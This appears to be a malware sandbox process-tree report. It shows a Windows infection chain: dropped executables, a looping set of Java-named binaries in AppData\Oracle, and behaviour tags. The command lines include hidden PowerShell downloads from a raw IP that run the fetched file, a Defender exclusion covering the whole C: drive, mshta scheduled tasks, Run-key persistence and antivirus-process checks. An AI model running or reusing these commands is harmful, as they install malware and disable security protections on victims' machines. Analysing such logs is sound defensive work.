[depth 6] C:\Program Files\Google\Chrome\Application\chrome.exe
  Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --string-annotations --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=6384,i,16345130905106928044,10585122376100627814,262144 --variations-seed-version --mojo-platform-channel-handle=6392 /prefetch:8
  PID: 5580

[depth 6] C:\Program Files\Google\Chrome\Application\chrome.exe
  Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=on_device_model.mojom.OnDeviceModelService --lang=en-US --service-sandbox-type=on_device_model_execution --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4744,i,16345130905106928044,10585122376100627814,262144 --variations-seed-version --mojo-platform-channel-handle=5428 /prefetch:8
  PID: 24888
[depth 3] C:\Users\Admin\AppData\Local\Temp\10361770101\7IIl2eE.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\10361770101\7IIl2eE.exe"
  - Checks computer location settings
  - Executes dropped EXE
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  PID: 6444

[depth 4] C:\Windows\SysWOW64\CMD.exe
  Command line: "C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat
  - System Location Discovery: System Language Discovery
  PID: 5524

[depth 5] C:\Windows\SysWOW64\tasklist.exe
  Command line: tasklist
  - Enumerates processes with tasklist
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  PID: 2376

[depth 5] C:\Windows\SysWOW64\findstr.exe
  Command line: findstr /I "opssvc wrsa"
  - System Location Discovery: System Language Discovery
  PID: 6416

[depth 5] C:\Windows\SysWOW64\tasklist.exe
  Command line: tasklist
  - Enumerates processes with tasklist
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  PID: 1332

[depth 5] C:\Windows\SysWOW64\findstr.exe
  Command line: findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
  - System Location Discovery: System Language Discovery
  PID: 6656

[depth 5] C:\Windows\SysWOW64\cmd.exe
  Command line: cmd /c md 418377
  - System Location Discovery: System Language Discovery
  PID: 2608

[depth 5] C:\Windows\SysWOW64\extrac32.exe
  Command line: extrac32 /Y /E Leon.cab
  - System Location Discovery: System Language Discovery
  PID: 6432

[depth 5] C:\Windows\SysWOW64\findstr.exe
  Command line: findstr /V "BEVERAGES" Compilation
  - System Location Discovery: System Language Discovery
  PID: 6380

[depth 5] C:\Windows\SysWOW64\cmd.exe
  Command line: cmd /c copy /b 418377\Passwords.com + Playing + New + Realized + Uw + Jpeg + Badly + Asbestos + Seeds + Service + Basis + Via 418377\Passwords.com
  - System Location Discovery: System Language Discovery
  PID: 3868

[depth 5] C:\Windows\SysWOW64\cmd.exe
  Command line: cmd /c copy /b ..\Pendant.cab + ..\Visitor.cab + ..\Illegal.cab + ..\Suddenly.cab + ..\Theology.cab + ..\Kidney.cab + ..\Flying.cab + ..\Tigers.cab N
  - System Location Discovery: System Language Discovery
  PID: 4360

[depth 5] C:\Users\Admin\AppData\Local\Temp\418377\Passwords.com
  Command line: Passwords.com N
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SendNotifyMessage
  PID: 2032

[depth 5] C:\Windows\SysWOW64\choice.exe
  Command line: choice /d y /t 5
  - System Location Discovery: System Language Discovery
  PID: 3896
[depth 3] C:\Users\Admin\AppData\Local\Temp\10361780101\TbV75ZR.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\10361780101\TbV75ZR.exe"
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID: 3116

[depth 4] C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
  Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - System Location Discovery: System Language Discovery
  PID: 2492

[depth 5] C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 2492 -s 488
  - Program crash
  PID: 3916
[depth 3] C:\Users\Admin\AppData\Local\Temp\10361790101\Rm3cVPI.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\10361790101\Rm3cVPI.exe"
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID: 3580
[depth 3] C:\Users\Admin\AppData\Local\Temp\10361800101\xZRvIQ5.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\10361800101\xZRvIQ5.exe"
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID: 7092

[depth 4] C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
  Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
  PID: 4484

[depth 4] C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
  Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
  - System Location Discovery: System Language Discovery
  PID: 7080
[depth 3] C:\Users\Admin\AppData\Local\Temp\10361810101\u75a1_003.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\10361810101\u75a1_003.exe"
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: MapViewOfSection
  PID: 7116

[depth 4] C:\Windows\SYSTEM32\cmd.exe
  Command line: cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
  PID: 6444

[depth 5] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Command line: powershell.exe Add-MpPreference -ExclusionPath 'C:'
  - Command and Scripting Interpreter: PowerShell
  PID: 4756

[depth 4] C:\Windows\system32\svchost.exe
  Command line: "C:\Windows\system32\svchost.exe"
  - Downloads MZ/PE file
  - Adds Run key to start application
  PID: 4980

[depth 5] C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
  Command line: "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
  - Executes dropped EXE
  PID: 5584

[depth 5] C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""
  - Deletes itself
  - Executes dropped EXE
  PID: 2260

[depth 6] C:\Users\Admin\AppData\Local\Temp\{cac49f1a-6569-4ad2-98cc-57bb9562c18e}\36575e69.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\{cac49f1a-6569-4ad2-98cc-57bb9562c18e}\36575e69.exe" -accepteula -adinsilent -silent -processlevel 2 -postboot
  - Checks for VirtualBox DLLs, possible anti-VM trick
  - System Location Discovery: System Language Discovery
  PID: 8188

[depth 7] C:\Users\Admin\AppData\Local\Temp\{fd9989c1-9e82-4819-a5b2-63078bff6123}\a28245d7.exe
  Command line: C:/Users/Admin/AppData/Local/Temp/{fd9989c1-9e82-4819-a5b2-63078bff6123}/\a28245d7.exe -accepteula -adinsilent -silent -processlevel 2 -postboot
  - Drops file in Drivers directory
  - Sets service image path in registry
  - Impair Defenses: Safe Mode Boot
  - Loads dropped DLL
  - Adds Run key to start application
  - Checks for any installed AV software in registry
  - Enumerates connected drives
  - Writes to the Master Boot Record (MBR)
  - Checks for VirtualBox DLLs, possible anti-VM trick
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  - NTFS ADS
  - Suspicious behavior: LoadsDriver
  PID: 7564
[depth 3] C:\Users\Admin\AppData\Local\Temp\10361820101\EPTwCQd.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\10361820101\EPTwCQd.exe"
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID: 4992

[depth 4] C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
  Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
  PID: 4352

[depth 4] C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
  Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
  - System Location Discovery: System Language Discovery
  PID: 1728
[depth 3] C:\Users\Admin\AppData\Local\Temp\10361830101\bot.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\10361830101\bot.exe"
  - Executes dropped EXE
  PID: 976

[depth 4] C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
  Command line: C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
  - Executes dropped EXE
  PID: 3516

[depth 5] C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
  Command line: C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
  - Executes dropped EXE
  PID: 6608

[depth 6] C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
  Command line: C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
  - Executes dropped EXE
  PID: 1520

[depth 7] C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
  Command line: C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
  - Executes dropped EXE
  PID: 6428

[depth 8] C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
  Command line: C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
  - Executes dropped EXE
  PID: 6796

[depth 9] C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
  Command line: C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
  - Executes dropped EXE
  PID: 1808

[depth 10] C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
  Command line: C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
  - Executes dropped EXE
  PID: 5200

[depth 11] C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
  Command line: C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
  - Executes dropped EXE
  PID: 7052

[depth 12] C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
  Command line: C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
  - Executes dropped EXE
  PID: 4856

[depth 13] C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
  Command line: C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
  - Executes dropped EXE
  PID: 6388

[depth 14] C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
  Command line: C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
  - Executes dropped EXE
  PID: 1344

[depth 15] C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
  Command line: C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
  - Executes dropped EXE
  PID: 7112

[depth 16] C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe
  Command line: C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe
  - Executes dropped EXE
  PID: 5940

[depth 17] C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
  Command line: C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
  - Executes dropped EXE
  PID: 4492

[depth 18] C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
  Command line: C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
  - Executes dropped EXE
  PID: 1500

[depth 19] C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
  Command line: C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
  - Executes dropped EXE
  PID: 1084

[depth 20] C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
  Command line: C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
  - Executes dropped EXE
  PID: 1408

[depth 21] C:\Windows\system32\reg.exe
  Command line: reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Java Platform SE javaplugin_update.exe"
  - Modifies registry key
  PID: 9280

[depth 21] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Command line: powershell -Command "Set-ItemProperty -Path \"HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" -Name \"Java Platform SE javaplugin_update.exe\" -Value '\"C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe\"'"
  - Command and Scripting Interpreter: PowerShell
  - Adds Run key to start application
  PID: 3500
[depth 3] C:\Users\Admin\AppData\Local\Temp\10361840101\fd5d9b8176.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\10361840101\fd5d9b8176.exe"
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  PID: 13160

[depth 4] C:\Users\Admin\AppData\Local\Temp\svchost015.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\10361840101\fd5d9b8176.exe"
  - Downloads MZ/PE file
  - System Location Discovery: System Language Discovery
  PID: 12980
[depth 3] C:\Users\Admin\AppData\Local\Temp\10361850101\cf533b34eb.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\10361850101\cf533b34eb.exe"
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  PID: 6588

[depth 4] C:\Users\Admin\AppData\Local\Temp\svchost015.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\10361850101\cf533b34eb.exe"
  - Downloads MZ/PE file
  - System Location Discovery: System Language Discovery
  PID: 8148
[depth 3] C:\Users\Admin\AppData\Local\Temp\10361860101\4220f70f80.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\10361860101\4220f70f80.exe"
  - Suspicious use of SetThreadContext
  PID: 7796

[depth 4] C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
  Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
  - System Location Discovery: System Language Discovery
  PID: 5612
[depth 3] C:\Users\Admin\AppData\Local\Temp\10361870101\9ff7443f7f.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\10361870101\9ff7443f7f.exe"
  - System Location Discovery: System Language Discovery
  - Suspicious use of SendNotifyMessage
  PID: 7956

[depth 4] C:\Windows\SysWOW64\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c schtasks /create /tn UmbFjmam8Jo /tr "mshta C:\Users\Admin\AppData\Local\Temp\pVedJJdJJ.hta" /sc minute /mo 25 /ru "Admin" /f
  - System Location Discovery: System Language Discovery
  PID: 1932

[depth 5] C:\Windows\SysWOW64\schtasks.exe
  Command line: schtasks /create /tn UmbFjmam8Jo /tr "mshta C:\Users\Admin\AppData\Local\Temp\pVedJJdJJ.hta" /sc minute /mo 25 /ru "Admin" /f
  - System Location Discovery: System Language Discovery
  - Scheduled Task/Job: Scheduled Task
  PID: 9104

[depth 4] C:\Windows\SysWOW64\mshta.exe
  Command line: mshta C:\Users\Admin\AppData\Local\Temp\pVedJJdJJ.hta
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  PID: 1360

[depth 5] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'W9WWZUDZY0TJU2PIH7GT8GHUCL1E7QKG.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Downloads MZ/PE file
  - System Location Discovery: System Language Discovery
  PID: 9224

[depth 6] C:\Users\Admin\AppData\Local\TempW9WWZUDZY0TJU2PIH7GT8GHUCL1E7QKG.EXE
  Command line: "C:\Users\Admin\AppData\Local\TempW9WWZUDZY0TJU2PIH7GT8GHUCL1E7QKG.EXE"
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  PID: 10624
[depth 3] C:\Windows\SysWOW64\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10361880121\am_no.cmd" "
  - System Location Discovery: System Language Discovery
  PID: 10492

[depth 4] C:\Windows\SysWOW64\timeout.exe
  Command line: timeout /t 2
  - System Location Discovery: System Language Discovery
  - Delays execution with timeout.exe
  PID: 10544

[depth 4] C:\Windows\SysWOW64\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
  - System Location Discovery: System Language Discovery
  PID: 10792

[depth 5] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  Command line: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
  - Command and Scripting Interpreter: PowerShell
  - System Location Discovery: System Language Discovery
  PID: 10888

[depth 4] C:\Windows\SysWOW64\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
  - System Location Discovery: System Language Discovery
  PID: 10972

[depth 5] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  Command line: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
  - Command and Scripting Interpreter: PowerShell
  - System Location Discovery: System Language Discovery
  PID: 10960

[depth 4] C:\Windows\SysWOW64\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
  - System Location Discovery: System Language Discovery
  PID: 11108

[depth 5] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  Command line: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
  - Command and Scripting Interpreter: PowerShell
  - System Location Discovery: System Language Discovery
  PID: 11092

[depth 4] C:\Windows\SysWOW64\schtasks.exe
  Command line: schtasks /create /tn "leysBmanSh5" /tr "mshta \"C:\Temp\r7Zd9ek18.hta\"" /sc minute /mo 25 /ru "Admin" /f
  - System Location Discovery: System Language Discovery
  - Scheduled Task/Job: Scheduled Task
  PID: 11436

[depth 4] C:\Windows\SysWOW64\mshta.exe
  Command line: mshta "C:\Temp\r7Zd9ek18.hta"
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  PID: 11444

[depth 5] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Downloads MZ/PE file
  - System Location Discovery: System Language Discovery
  PID: 11572

[depth 6] C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  PID: 12232
[depth 1] C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
  Command line: "C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
  PID: 4900

[depth 1] C:\Windows\system32\svchost.exe
  Command line: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
  PID: 3548

[depth 1] C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
  PID: 3688

[depth 1] C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
  Command line: C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  PID: 3608

[depth 1] C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
  Command line: "C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
  PID: 2788

[depth 1] C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
  PID: 5524

[depth 1] C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
  Command line: C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  PID: 4404

[depth 1] C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
  Command line: "C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
  PID: 5912

[depth 1] C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 2492 -ip 2492
  PID: 6020

[depth 1] C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
  PID: 6112

[depth 1] C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
  PID: 6092
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe"1⤵PID:5612
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe2⤵
- Executes dropped EXE
PID:3784 -
C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe3⤵
- Executes dropped EXE
PID:7248 -
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe4⤵
- Executes dropped EXE
PID:7368 -
C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe5⤵
- Executes dropped EXE
PID:7412 -
C:\Windows\system32\reg.exereg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Java Platform SE javaservice_service.exe"6⤵
- Modifies registry key
PID:7452
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-ItemProperty -Path \"HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" -Name \"Java Platform SE javaservice_service.exe\" -Value '\"C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe\"'"6⤵
- Command and Scripting Interpreter: PowerShell
- Adds Run key to start application
PID:7516
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe"1⤵PID:7684
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe2⤵
- Executes dropped EXE
PID:7728 -
C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe3⤵
- Executes dropped EXE
PID:7776 -
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe4⤵
- Executes dropped EXE
PID:7836 -
C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe5⤵
- Executes dropped EXE
PID:7884 -
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe6⤵
- Executes dropped EXE
PID:7940 -
C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe7⤵
- Executes dropped EXE
PID:7984 -
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe8⤵
- Executes dropped EXE
PID:8036 -
C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe9⤵
- Executes dropped EXE
PID:8076 -
C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe10⤵
- Executes dropped EXE
PID:8128 -
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe11⤵
- Executes dropped EXE
PID:8180 -
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe12⤵
- Executes dropped EXE
PID:8228 -
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe13⤵
- Executes dropped EXE
PID:8260 -
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe14⤵
- Executes dropped EXE
PID:8304 -
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe15⤵
- Executes dropped EXE
PID:8352 -
C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe16⤵
- Executes dropped EXE
PID:8396 -
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe17⤵
- Executes dropped EXE
PID:8432 -
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe18⤵
- Executes dropped EXE
PID:8496 -
C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe19⤵
- Executes dropped EXE
PID:8528 -
C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe20⤵
- Executes dropped EXE
PID:8580 -
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe21⤵
- Executes dropped EXE
PID:8640 -
C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe22⤵
- Executes dropped EXE
PID:8680 -
C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe23⤵PID:8724
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe24⤵PID:8776
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe25⤵PID:8820
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe26⤵PID:8872
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe27⤵PID:8920
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe28⤵PID:8964
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe29⤵PID:9008
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe30⤵PID:9064
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe31⤵PID:9108
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe32⤵PID:9156
-
